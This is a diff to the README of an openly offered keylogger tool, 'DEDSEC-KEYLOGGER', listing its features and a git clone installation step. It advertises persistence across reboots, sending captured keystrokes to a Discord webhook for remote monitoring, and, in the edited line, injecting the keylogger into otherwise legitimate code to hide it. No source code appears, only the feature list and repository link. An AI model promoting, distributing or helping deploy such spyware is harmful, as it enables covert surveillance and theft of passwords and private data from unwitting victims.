0xbitx/DEDSEC-KEYLOGGER/README.md

   * Persistent Payload: Maintains continuous operation across system reboots or shutdowns.

-  * Custom Template Payload: Offers flexibility with customizable payload templates for tailored deployment.
+  * Custom Payload: you can inject the dedsec keylogger to your legit code.

   * Discord Webhook Integration: Utilizes Discord webhooks to send captured data, enabling remote monitoring.

   * Keystroke Conversion: Converts captured keystrokes into a human-readable format, resembling what the user sees on the screen, enhancing readability and comprehension of captured data.

 ### INSTALLATION
     * git clone https://github.com/0xbitx/DEDSEC_KEYLOGGER.git